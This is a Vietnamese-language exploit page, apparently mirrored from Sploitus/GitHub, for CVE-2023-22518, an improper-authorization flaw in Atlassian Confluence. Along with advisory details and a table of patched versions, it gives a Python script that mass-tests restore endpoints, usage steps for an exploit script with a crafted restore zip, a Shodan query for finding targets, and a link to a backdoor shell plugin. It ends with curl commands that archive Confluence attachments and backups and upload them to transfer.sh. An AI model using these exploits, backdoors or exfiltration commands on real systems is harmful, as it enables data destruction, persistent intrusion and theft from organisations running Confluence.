Share
## https://sploitus.com/exploit?id=6F53A30C-B648-58FC-8402-A5D9C6E4B245
# CVE-2023-22518
Lỗ hổng Phân Quyền Không Chính Xác trong Confluence Data Center và Server.

Atlassian đã cảnh báo quản trị viên về lỗ hổng nghiêm trọng trong Confluence. Việc khai thác lỗ hổng này có thể dẫn đến mất dữ liệu, do đó nhà phát triển khuyến cáo bạn nên cài đặt bản vá ngay lập tức.

Được lưu ý rằng lỗ hổng không thể được sử dụng để rò rỉ dữ liệu và không ảnh hưởng đến các trang Atlassian Cloud được truy cập qua tên miền atlassian.net.

[Thông tin chi tiết về lỗ hổng](https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html)

[Trang Jira Atlassian](https://jira.atlassian.com/browse/CONFSERVER-93142)

| Sản phẩm        | Phiên bản bị ảnh hưởng      | Phiên bản đã vá     |
|-----------------------|----------------------------------|-------------------------|
| Confluence Data Center | Tất cả phiên bản đều bị ảnh hưởng | 7.19.16 trở lên     |
| Confluence Server   |                 | 8.3.4 trở lên      |
|            |                 | 8.4.4 trở lên      |
|            |                 | 8.5.3 trở lên      |
|            |                 | 8.6.1 trở lên      |

## Khai thác
Loại: Phân quyền không chính xác

CWE: [CWE-285 / CWE-266](https://cwe.mitre.org/data/definitions/285.html)

ATT&CK: [T1548.002](https://attack.mitre.org/techniques/T1548/002/)

## Các véc-tơ tấn công đã biết 🔥
/json/setup-restore.action

/json/setup-restore-local.action

/json/setup-restore-progress.action

/server-info.action [Diễn đàn](https://community.atlassian.com/t5/Confluence-questions/Is-CVE-2023-22515-also-exploitable-via-server-info-action/qaq-p/2501129)

## Ví dụ đơn giản về kiểm tra lỗ hổng bằng Python


```
import requests
import random
import string
import argparse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def random_string(length=10):
  letters = string.ascii_lowercase
  return ''.join(random.choice(letters) for i in range(length))

def post_setup_restore(baseurl):
  paths = ["/json/setup-restore.action", "/json/setup-restore-local.action", "/json/setup-restore-progress.action", "/server-info.action"]
  for path in paths:
    url = f"{baseurl.rstrip('/')}{path}"

    headers = {
      "X-Atlassian-Token": "no-check",
      "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7"
    }

    rand_str = random_string()
    data = (
      "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
      "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"
      "true\r\n"
      "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
      f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"
      f"{rand_str}\r\n"
      "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
      "Content-Disposition: form-data; name=\"edit\"\r\n\r\n"
      "Upload and import\r\n"
      "------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n"
    )

    try:
      response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)

      if (response.status_code == 200 and
        'The zip file did not contain an entry' in response.text and 
        'exportDescriptor.properties' in response.text):
        print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!")
      else:
        print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.")
    except requests.RequestException as e:
      print(f"[*] Error connecting to {url}. Error: {e}")

def main():
  parser = argparse.ArgumentParser(description="Post setup restore script")
  parser.add_argument('--url', help='The URL to target', required=False)
  parser.add_argument('--file', help='Filename containing a list of URLs', required=False)
  args = parser.parse_args()

  if args.url:
    post_setup_restore(args.url)
  elif args.file:
    with open(args.file, 'r') as f:
      for line in f:
        url = line.strip()
        if url:
          post_setup_restore(url)
  else:
    print("You must provide either --url or --file argument.")

if __name__ == "__main__":
  main()
```

## Sử dụng kịch bản khai thác 🔥

[exploit.py](https://github.com/ForceFledgling/CVE-2023-22518/blob/main/exploit.py)

```
pip install pycryptodome
python3 exploit.py
Nhập URL: http://domain/json/setup-restore.action?synchronous=true
Nhập đường dẫn tới file .zip: /path/xmlexport-20231109-060519-1.zip
```

## BugsBonus 🔥
Tìm kiếm Shodan:
```
http.favicon.hash:-305179312
```

[exploit-restore.zip](https://github.com/ForceFledgling/CVE-2023-22518/blob/main/xmlexport-20231109-060519-1.zip)

[Ứng dụng Confluence Backdoor Shell](https://github.com/ForceFledgling/CVE-2023-22518/blob/main/atlplug.jar)

Khi khôi phục Confluence sử dụng lỗ hổng này, thư mục %CONFLUENCE_HOME%/attachments vẫn chứa đầy tệp tin, có thể lên đến hàng ngàn. Việc trích xuất chúng khá đơn giản, và phần mở rộng của chúng có thể được xác định bằng lệnh file của Linux. Ví dụ:
```
file /var/lib/confluence/attachments/v4/191/28/77273124/77273124.1
/var/lib/confluence/attachments/v4/191/28/77273124/77273124.1: PNG image data, 442 x 170, 8-bit/color RGBA, non-interlaced

Hoặc

file /var/atlassian/application-data/confluence/attachments/v4/114/128/3506237/3506237.1
/var/atlassian/application-data/confluence/attachments/v4/114/128/3506237/3506237.1: PNG image data, 1250 x 674, 8-bit/color RGBA, non-interlaced
```

Ví dụ về cách lưu trữ một thư mục dễ dàng và giải nén lưu trữ:
```
tar -czvf /var/atlassian/application-data/confluence/attachments_backup.tar.gz /var/atlassian/application-data/confluence/attachments
curl --upload-file /var/atlassian/application-data/attachments_backup.tar.gz https://transfer.sh/attachments_backup.tar.gz
https://transfer.sh/***********/attachments_backup.tar.gz

or

curl --upload-file /var/atlassian/application-data/confluence/backups/backup-2023_09_26.zip https://transfer.sh/backup-2023_09_26.zip
https://transfer.sh/***********/backup-2023_09_26.zip
```
[Bài báo về backdoor mới tồn tại ngay cả sau khi vá lỗ hổng nghiêm trọng của Confluence](https://www.theregister.com/2023/11/14/novel_backdoor_persists_confluence/)

##

[Thông tin hữu ích khác](https://github.com/ForceFledgling/CVE-2023-22518/blob/main/DETAIL.md)